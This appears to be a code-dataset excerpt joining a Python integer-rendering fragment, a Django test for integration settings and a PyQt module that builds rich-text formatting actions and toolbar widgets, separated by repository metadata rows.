max_num = binary_string_to_int("1" + "0" * (bit_width - 1))
# chop off the sign bit.
val = value & binary_string_to_int("1" * (bit_width - 1))
# account for the fact that the negative scale works backwards.
val = max_num - val - 1
# toss in the negative sign.
_rendered = "%d" % ~val
# unsigned integer or positive signed integer.
else:
_rendered = "%d" % value
return _rendered
| gpl-2.0 | 3,794,698,004,206,549,500 | 33.564356 | 120 | 0.574048 | false |
ubyssey/dispatch | dispatch/tests/test_core.py | 1 | 1743 | from django.test import TestCase
from dispatch.modules.integrations import BaseIntegration
class IntegrationTestCase(TestCase):
class TestIntegration(BaseIntegration):
ID = 'test-integration'
HIDDEN_FIELDS = [
'setting_d'
]
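        # setting_d is hidden: get_settings() omits it unless show_hidden=True,
        # which test_integration_hidden_settings below exercises.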
def test_integration_returns_empty_settings(self):
self.assertEqual(self.TestIntegration.get_settings(), {})
def test_integration_adds_new_settings(self):
self.TestIntegration.update_settings({'setting_a': 'a', 'setting_b': 'b'})
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_a'], 'a')
self.assertEqual(settings['setting_b'], 'b')
def test_integration_updates_existing_setting(self):
# Set setting_a to 1
self.TestIntegration.update_settings({'setting_a': '1'})
# Verify that setting_a has been saved as 1
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_a'], '1')
# Update setting_a to 2
self.TestIntegration.update_settings({'setting_a': '2'})
# Verify that setting_a has been updated to 2
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_a'], '2')
def test_integration_hidden_settings(self):
self.TestIntegration.update_settings({'setting_c': 'c', 'setting_d': 'd'})
settings = self.TestIntegration.get_settings()
self.assertEqual(settings['setting_c'], 'c')
self.assertEqual('setting_d' in settings, False)
settings = self.TestIntegration.get_settings(show_hidden=True)
self.assertEqual(settings['setting_c'], 'c')
self.assertEqual(settings['setting_d'], 'd')
| gpl-2.0 | -5,843,173,825,848,535,000 | 30.690909 | 82 | 0.653471 | false |
mtils/ems | ems/qt/richtext/char_format_actions.py | 1 | 6238 |
from ems.qt import QtWidgets, QtCore, QtGui
from ems.qt.richtext.char_format_proxy import CharFormatProxy
Qt = QtCore.Qt
QObject = QtCore.QObject
QColor = QtGui.QColor
QAction = QtWidgets.QAction
QKeySequence = QtGui.QKeySequence
QFont = QtGui.QFont
QIcon = QtGui.QIcon
QPixmap = QtGui.QPixmap
ThemeIcon = QIcon.fromTheme
QApplication = QtWidgets.QApplication
QColorDialog = QtWidgets.QColorDialog
QFontComboBox = QtWidgets.QFontComboBox
QComboBox = QtWidgets.QComboBox
QFontDatabase = QtGui.QFontDatabase
QTextDocument = QtGui.QTextDocument
QTextCharFormat = QtGui.QTextCharFormat
pyqtSignal = QtCore.pyqtSignal
pyqtSlot = QtCore.pyqtSlot
pyqtProperty = QtCore.pyqtProperty
class CharFormatActions(QObject):
documentChanged = pyqtSignal(QTextDocument)
currentBlockFormatChanged = pyqtSignal(QTextCharFormat)
def __init__(self, parentWidget, signalProxy=None, resourcePath=':/text-editor'):
super(CharFormatActions, self).__init__(parentWidget)
self.resourcePath = resourcePath
self.actions = []
self.widgets = []
self.signals = CharFormatProxy(self) if signalProxy is None else signalProxy
self._addActions(self.parent())
self._document = QTextDocument()
self._lastBlockFormat = None
def getDocument(self):
return self._document
@pyqtSlot(QTextDocument)
def setDocument(self, document):
if self._document is document:
return
if self._document:
self._disconnectFromDocument(self._document)
self._document = document
self.documentChanged.emit(self._document)
document = pyqtProperty(QTextDocument, getDocument, setDocument)
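    # Exposing the document as a Qt property lets generic Qt code use
    # QObject.property()/setProperty() in addition to the explicit accessors.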
    def _disconnectFromDocument(self, document):
        # Placeholder: no document-specific connections to tear down yet.
        return
def _addActions(self, parent):
self.actionTextBold = QAction(
ThemeIcon('format-text-bold', self._icon('bold.png')),
"&Bold", parent, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_B,
triggered=self.signals.setBold, checkable=True)
bold = QFont()
bold.setBold(True)
self.actionTextBold.setFont(bold)
self.signals.boldChanged.connect(self.actionTextBold.setChecked)
self.actions.append(self.actionTextBold)
self.actionTextItalic = QAction(
ThemeIcon('format-text-italic', self._icon('italic.png')),
"&Italic", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_I,
triggered=self.signals.setItalic, checkable=True)
italic = QFont()
italic.setItalic(True)
self.actionTextItalic.setFont(italic)
self.signals.italicChanged.connect(self.actionTextItalic.setChecked)
self.actions.append(self.actionTextItalic)
self.actionTextUnderline = QAction(
ThemeIcon('format-text-underline', self._icon('underline.png')),
"&Underline", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_U,
triggered=self.signals.setUnderline, checkable=True)
underline = QFont()
underline.setUnderline(True)
self.actionTextUnderline.setFont(underline)
self.actions.append(self.actionTextUnderline)
self.signals.underlineChanged.connect(self.actionTextUnderline.setChecked)
pix = QPixmap(16, 16)
pix.fill(Qt.black)
self.actionTextColor = QAction(QIcon(pix), "&Color...",
self, triggered=self._textColor)
self.signals.foregroundColorChanged.connect(self._colorChanged)
self.actions.append(self.actionTextColor)
self.actionClearFormat = QAction(ThemeIcon('format-text-clear', self._icon('magic.png')),
"&Remove Format", self, priority=QAction.LowPriority,
shortcut=Qt.CTRL + Qt.Key_E,
triggered=self.signals.clearFormat)
self.actions.append(self.actionClearFormat)
self.fontCombo = QFontComboBox()
self.fontCombo.activated[str].connect(self.signals.setFontFamily)
self.signals.fontFamilyChanged.connect(self.setFontFamily)
self.widgets.append(self.fontCombo)
self.sizeCombo = QComboBox()
self.sizeCombo.setObjectName("sizeCombo")
self.sizeCombo.setEditable(True)
self.signals.pointSizeChanged.connect(self.setFontPointSize)
self.widgets.append(self.sizeCombo)
db = QFontDatabase()
for size in db.standardSizes():
self.sizeCombo.addItem("{}".format(size))
self.sizeCombo.activated[str].connect(self._textSize)
self.sizeCombo.setCurrentIndex(
self.sizeCombo.findText(
"{}".format(QApplication.font().pointSize())
)
)
def _textColor(self):
color = self.signals.getForegroundColor()
if not color:
color = QColor(0,0,0)
col = QColorDialog.getColor(color, self.parent())
if not col.isValid():
return
self.signals.setForegroundColor(col)
def _colorChanged(self, color):
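        # Repaint the swatch icon on the color action to match the new color.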
pix = QPixmap(16, 16)
pix.fill(color)
self.actionTextColor.setIcon(QIcon(pix))
def _textSize(self, pointSize):
pointSize = float(pointSize)
if pointSize < 0:
return
self.signals.setPointSize(pointSize)
def addToToolbar(self, toolbar, addActions=True, addWidgets=True):
if addActions:
for action in self.actions:
toolbar.addAction(action)
if not addWidgets:
return
for widget in self.widgets:
widget.setParent(toolbar)
toolbar.addWidget(widget)
def setFontFamily(self, family):
self.fontCombo.setCurrentIndex(self.fontCombo.findText(family))
def setFontPointSize(self, pointSize):
self.sizeCombo.setCurrentIndex(self.sizeCombo.findText("{}".format(int(pointSize))))
def iconPath(self, fileName):
return self.resourcePath + '/' + fileName
def _icon(self, fileName):
return QIcon(self.iconPath(fileName)) | mit | 4,689,382,300,073,918,000 | 32.543011 | 97 | 0.648124 | false |